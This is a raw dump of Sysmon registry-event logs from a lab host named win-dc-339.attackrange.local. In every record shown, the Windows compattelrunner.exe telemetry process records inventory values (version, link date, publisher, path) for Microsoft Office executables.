14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msoicons.exe|3da37cfb4950ecae\LinkDate12/09/2018 01:13:36 13241300x800000000000000077393Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msoicons.exe|3da37cfb4950ecae\Publishermicrosoft corporation 13241300x800000000000000077392Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msoicons.exe|3da37cfb4950ecae\LowerCaseLongPathc:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\msoicons.exe 13241300x800000000000000077391Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msoia.exe|114864795aa55b83\BinProductVersion16.0.13127.21210 13241300x800000000000000077390Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msoia.exe|114864795aa55b83\LinkDate02/05/2021 12:51:30 13241300x800000000000000077389Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msoia.exe|114864795aa55b83\Publishermicrosoft corporation 13241300x800000000000000077388Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msoia.exe|114864795aa55b83\LowerCaseLongPathc:\program files\microsoft office\root\office16\msoia.exe 13241300x800000000000000077387Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msohtmed.exe|99dd74e197b774bf\BinProductVersion16.0.13127.21216 13241300x800000000000000077386Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msohtmed.exe|99dd74e197b774bf\LinkDate02/06/2021 17:04:32 13241300x800000000000000077385Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msohtmed.exe|99dd74e197b774bf\Publishermicrosoft corporation 13241300x800000000000000077384Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msohtmed.exe|99dd74e197b774bf\LowerCaseLongPathc:\program files\microsoft office\root\vfs\programfilesx86\microsoft office\office16\msohtmed.exe 13241300x800000000000000077383Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msohtmed.exe|148478b1871e8bf3\BinProductVersion16.0.13127.21216 13241300x800000000000000077382Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msohtmed.exe|148478b1871e8bf3\LinkDate02/06/2021 17:09:21 13241300x800000000000000077381Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msohtmed.exe|148478b1871e8bf3\Publishermicrosoft corporation 13241300x800000000000000077380Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msohtmed.exe|148478b1871e8bf3\LowerCaseLongPathc:\program files\microsoft office\root\office16\msohtmed.exe 13241300x800000000000000077379Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msoev.exe|b4e37bd46f9380f9\BinProductVersion16.0.13127.21348 13241300x800000000000000077378Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msoev.exe|b4e37bd46f9380f9\LinkDate03/06/2021 23:38:12 13241300x800000000000000077377Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msoev.exe|b4e37bd46f9380f9\Publishermicrosoft corporation 13241300x800000000000000077376Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msoev.exe|b4e37bd46f9380f9\LowerCaseLongPathc:\program files\microsoft office\root\office16\msoev.exe 13241300x800000000000000077375Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msoasb.exe|750d1f3936d98f5d\BinProductVersion16.0.13127.21210 13241300x800000000000000077374Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msoasb.exe|750d1f3936d98f5d\LinkDate02/05/2021 12:55:08 13241300x800000000000000077373Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msoasb.exe|750d1f3936d98f5d\Publishermicrosoft corporation 13241300x800000000000000077372Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msoasb.exe|750d1f3936d98f5d\LowerCaseLongPathc:\program files\microsoft office\root\office16\msoasb.exe 13241300x800000000000000077371Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msoadfsb.exe|53077702cdcc8005\BinProductVersion16.0.13127.21348 13241300x800000000000000077370Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msoadfsb.exe|53077702cdcc8005\LinkDate03/06/2021 23:34:56 13241300x800000000000000077369Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msoadfsb.exe|53077702cdcc8005\Publishermicrosoft corporation 13241300x800000000000000077368Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msoadfsb.exe|53077702cdcc8005\LowerCaseLongPathc:\program files\microsoft office\root\office16\msoadfsb.exe 13241300x800000000000000077367Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msaccess.exe|77cffae26fbe2b5\BinProductVersion16.0.13127.21348 13241300x800000000000000077366Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msaccess.exe|77cffae26fbe2b5\LinkDate03/06/2021 23:36:31 13241300x800000000000000077365Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msaccess.exe|77cffae26fbe2b5\Publishermicrosoft corporation 13241300x800000000000000077364Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\msaccess.exe|77cffae26fbe2b5\LowerCaseLongPathc:\program files\microsoft office\root\office16\msaccess.exe 13241300x800000000000000077363Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\mlcfg32.cpl|31c16fc3f63fc7dc\BinProductVersion16.0.13127.20204 13241300x800000000000000077362Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\mlcfg32.cpl|31c16fc3f63fc7dc\LinkDate08/15/2020 17:23:02 13241300x800000000000000077361Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\mlcfg32.cpl|31c16fc3f63fc7dc\Publishermicrosoft corporation 13241300x800000000000000077360Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\mlcfg32.cpl|31c16fc3f63fc7dc\LowerCaseLongPathc:\program files\microsoft office\root\office16\mlcfg32.cpl 13241300x800000000000000077359Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\misc.exe|e53c61630655f462\BinProductVersion16.0.13127.21336 13241300x800000000000000077358Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\misc.exe|e53c61630655f462\LinkDate03/05/2021 02:06:37 13241300x800000000000000077357Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\misc.exe|e53c61630655f462\Publishermicrosoft corporation 13241300x800000000000000077356Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\misc.exe|e53c61630655f462\LowerCaseLongPathc:\program files\microsoft office\root\vfs\windows\installer\{90160000-001f-0c0a-1000-0000000ff1ce}\misc.exe 13241300x800000000000000077355Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\misc.exe|d72ba68dc6224853\BinProductVersion16.0.13127.21336 13241300x800000000000000077354Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\misc.exe|d72ba68dc6224853\LinkDate03/05/2021 02:06:37 13241300x800000000000000077353Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\misc.exe|d72ba68dc6224853\Publishermicrosoft corporation 13241300x800000000000000077352Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\misc.exe|d72ba68dc6224853\LowerCaseLongPathc:\program files\microsoft office\root\vfs\windows\installer\{90160000-006e-0409-1000-0000000ff1ce}\misc.exe 13241300x800000000000000077351Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\misc.exe|88c5db986dc6d3ce\BinProductVersion16.0.13127.21336 13241300x800000000000000077350Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\misc.exe|88c5db986dc6d3ce\LinkDate03/05/2021 02:06:37 13241300x800000000000000077349Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\misc.exe|88c5db986dc6d3ce\Publishermicrosoft corporation 13241300x800000000000000077348Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\misc.exe|88c5db986dc6d3ce\LowerCaseLongPathc:\program files\microsoft office\root\vfs\windows\installer\{90160000-001f-040c-1000-0000000ff1ce}\misc.exe 13241300x800000000000000077347Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\misc.exe|74c239057bc7b55b\BinProductVersion16.0.13127.21336 13241300x800000000000000077346Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\misc.exe|74c239057bc7b55b\LinkDate03/05/2021 02:06:37 13241300x800000000000000077345Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\misc.exe|74c239057bc7b55b\Publishermicrosoft corporation 13241300x800000000000000077344Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\misc.exe|74c239057bc7b55b\LowerCaseLongPathc:\program files\microsoft office\root\vfs\windows\installer\{90160000-001f-0409-1000-0000000ff1ce}\misc.exe 13241300x800000000000000077343Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\misc.exe|6a82b5241464385b\BinProductVersion16.0.8528.2126 13241300x800000000000000077342Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\misc.exe|6a82b5241464385b\LinkDate09/29/2017 23:29:19 13241300x800000000000000077341Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\misc.exe|6a82b5241464385b\Publishermicrosoft corporation 13241300x800000000000000077340Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\misc.exe|6a82b5241464385b\LowerCaseLongPathc:\program files\microsoft office\root\office16\misc.exe 13241300x800000000000000077339Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\misc.exe|34dbf5ff896a9c69\BinProductVersion16.0.13127.21336 13241300x800000000000000077338Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\misc.exe|34dbf5ff896a9c69\LinkDate03/05/2021 02:06:37 13241300x800000000000000077337Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\misc.exe|34dbf5ff896a9c69\Publishermicrosoft corporation 13241300x800000000000000077336Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\misc.exe|34dbf5ff896a9c69\LowerCaseLongPathc:\program files\microsoft office\root\vfs\windows\installer\{90160000-000f-0000-1000-0000000ff1ce}\misc.exe 13241300x800000000000000077335Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\microsoft.mashup|f091cf2f235e136d\BinProductVersion0.0.0.0 13241300x800000000000000077334Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\microsoft.mashup|f091cf2f235e136d\LinkDate08/18/2020 19:40:54 13241300x800000000000000077333Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\microsoft.mashup|f091cf2f235e136d\Publishermicrosoft corporation 13241300x800000000000000077332Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\microsoft.mashup|f091cf2f235e136d\LowerCaseLongPathc:\program files\microsoft office\root\office16\addins\microsoft power query for excel integrated\bin\microsoft.mashup.container.netfx45.exe 13241300x800000000000000077331Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\microsoft.mashup|a56df878940cffa2\BinProductVersion0.0.0.0 13241300x800000000000000077330Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\microsoft.mashup|a56df878940cffa2\LinkDate08/18/2020 19:40:54 13241300x800000000000000077329Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\microsoft.mashup|a56df878940cffa2\Publishermicrosoft corporation 13241300x800000000000000077328Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\microsoft.mashup|a56df878940cffa2\LowerCaseLongPathc:\program files\microsoft office\root\office16\addins\microsoft power query for excel integrated\bin\microsoft.mashup.container.netfx40.exe 13241300x800000000000000077327Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-VerSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\microsoft.mashup|2c539c4e8f922a27\BinProductVersion0.0.0.0 13241300x800000000000000077326Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-CompileTimeClaimSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\microsoft.mashup|2c539c4e8f922a27\LinkDate08/18/2020 19:40:54 13241300x800000000000000077325Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:02.732{A7A01FEF-EBF9-607E-E20D-00000000BB01}4004C:\Windows\system32\compattelrunner.exe\REGISTRY\A\{f3c58711-d326-a784-52f5-00f218df9514}\Root\InventoryApplicationFile\microsoft.mashup|2c539c4e8f922a27\Publishermicrosoft corporation 13241300x800000000000000077324Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PathSetValue2021-04-20 